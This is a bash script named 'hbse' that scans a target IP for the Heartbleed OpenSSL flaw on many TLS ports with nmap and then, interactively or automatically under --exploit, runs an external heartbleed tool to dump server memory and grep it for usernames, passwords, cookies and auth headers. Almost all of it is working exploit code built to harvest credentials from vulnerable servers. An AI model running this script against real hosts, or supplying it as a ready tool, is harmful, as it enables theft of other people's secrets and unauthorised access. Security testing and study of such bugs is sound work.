# Heartbleed
#Affected OpenSSL versions
#The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
#Later versions (1.0.1g and newer) and earlier versions (the 1.0.0 branch and older) are not vulnerable.
#Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
# Scan and exploit
# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
# cat hbse
#!/bin/bash
### TCP ####
# 443 (HTTPS - HTTP over SSL)
# 465 (SMTPS - SMTP over SSL)
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 989 (FTPS Data - FTP Data over TLS/SSL)
# 990 (FTPS Control - FTP Control over TLS/SSL)
# 992 (Telnet over TLS/SSL)
# 993 (IMAPS - IMAP over SSL)
# 995 (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)
### UDP ###
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)
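# Command-line handling.
#   hbse <ip>                    interactive: scan, then prompt before each step
#   hbse --scan|--exploit <ip>   non-interactive; the mode selector is kept in $se
# Any other arity prints usage to stderr and exits non-zero instead of
# exiting silently.
if [ $# -eq 1 ]; then
  ip="$1"
elif [ $# -eq 2 ]; then
  se="$1"
  ip="$2"
else
  printf 'Usage: %s [--scan|--exploit] <ip>\n' "${0##*/}" >&2
  exit 2
fi
# NOTE(review): with two arguments $1 is not validated; any value other than
# --scan or --exploit falls through to the interactive prompts further down.

# Port list handed to `nmap -p`; mirrors the TCP/UDP comment block above.
# NOTE(review): nmap only scans U: ports when invoked with -sU, which the
# scan below does not pass, so the UDP entries are most likely ignored.
readonly nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"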
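#######################################
# Print colored text to stdout without a trailing newline.
# Arguments: $1 - text; backslash escapes (e.g. "\n") are interpreted as
#                 with `echo -e`, so only pass text the script controls
#            $2 - color name: gray, red, green or yellow; any other value
#                 prints the text uncolored (still followed by the reset code)
# Outputs:   the text wrapped in ANSI SGR codes, reset at the end
# Returns:   0
#######################################
function print() {
  local text="$1"
  local color="$2"
  local header=""
  case "$color" in
    gray)   header="\e[38;5;250m" ;;
    red)    header="\e[91m" ;;
    green)  header="\e[92m" ;;
    yellow) header="\e[93m" ;;
  esac
  local tail="\e[0m"
  # %b expands the backslash escapes in the argument like `echo -e`.
  # Quoting keeps runs of spaces, embedded newlines (e.g. a multi-line
  # port list) and glob characters in $text intact.
  printf '%b' "${header}${text}${tail}"
}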
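# Main flow.
#   1. Probe port 443 with nmap's ssl-heartbleed NSE script.
#   2. If it reports VULNERABLE, re-scan every port in $nports and collect
#      the port numbers nmap reports as open and VULNERABLE.
#   3. Unless --scan was given, optionally run ./heartbleed (an external
#      binary, not part of this file) against each port and grep its dump.
# Requires nmap (with the ssl-heartbleed script) and, for step 3,
# ./heartbleed in the current directory. Uses $ip, $se, $nports and print()
# defined above. NOTE(review): a host whose 443 is patched but that still
# runs a vulnerable service on another listed port is reported as "No" and
# never reaches step 2.
if ! command -v nmap >/dev/null 2>&1; then
  print "Error: nmap is not installed or not in PATH.\n" "red"
  exit 1
fi

print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable=$(nmap -p T:443 -script ssl-heartbleed "$ip" | grep VULNERABLE)
if [ -z "$vulnerable" ]; then
  print "No\n" "red"
  exit 0
fi
print "Yes\n" "green"

print "Checking if it is vulnerable on other ports... " "gray"
# nmap prints the port line ("443/tcp open https") two lines above the
# "VULNERABLE:" marker; keep only the number before the '/'. This depends on
# the NSE output layout and yields an empty list if that layout changes.
vports=$(nmap -p "$nports" -script ssl-heartbleed "$ip" \
  | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}')

# One array element per reported port. An empty $vports still yields one
# (empty) element, so the singular/plural choice below matches a line count.
# An array also lets the exploit loop `read` answers from the terminal
# without redirecting the port list through a separate descriptor.
port_list=()
while IFS= read -r p; do
  port_list+=("$p")
done <<< "$vports"

if [ "${#port_list[@]}" -eq 1 ]; then
  print "No\n" "red"
  w1="port"
  w2="it"
  w3="file"
else
  print "Yes\n" "green"
  w1="ports"
  w2="them"
  w3="files"
fi
print "Vulnerable $w1:\n" "gray"
print "$vports\n" "green"

case "$se" in
  --scan) exit 0 ;;
  --exploit) answer="Y" ;;
  *)
    print "Do you want to exploit $w2? [Yn] " "gray"
    read -r answer
    ;;
esac
[ "$answer" = "Y" ] || exit 0

if [ ! -x ./heartbleed ]; then
  print "Error: ./heartbleed not found or not executable in the current directory.\n" "red"
  exit 1
fi

print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
for port in "${port_list[@]}"; do
  [ -n "$port" ] || continue
  print "+ Port [$port]\n" "gray"
  ofile="$ip.$port"
  rm -f -- "$ofile"
  # Extra arguments for ./heartbleed on the mail ports; their meaning is
  # defined by that tool, which is not shown here.
  case "$port" in
    465) precmd=(-c 0) ;;
    993) precmd=(-c 2) ;;
    995) precmd=(-c 1) ;;
    *)   precmd=() ;;
  esac
  ./heartbleed -s "$ip" -p "$port" -f "$ofile" "${precmd[@]}" -t 1 >/dev/null 2>&1
  if [ ! -f "$ofile" ]; then
    print "Error: heartbleed did not work on port $port...\n" "yellow"
    continue
  fi
  r=$(strings "$ofile" | grep -i -e user -e pass -e login -e auth -e cookie -e basic)
  # $r is taken from the remote process's memory and is untrusted: print it
  # with %s so backslash sequences in the dump are shown literally rather
  # than interpreted as terminal escapes (print() uses echo -e semantics).
  printf '\e[92m%s\e[0m\n' "$r"
  if [ "$se" != "--exploit" ]; then
    print "Do you want to less the hexdump file? [Yn] " "gray"
    read -r answer
    if [ "$answer" = "Y" ]; then
      hexdump -C "$ofile" | less
    fi
  fi
done

if [ "$se" != "--exploit" ]; then
  print "Do you want to delete the hexdump $w3? [Yn] " "gray"
  read -r answer
  if [ "$answer" = "Y" ]; then
    # ${ip:?} aborts instead of expanding to a bare ".*" if $ip were empty.
    rm -f -- "${ip:?}".*
  fi
fi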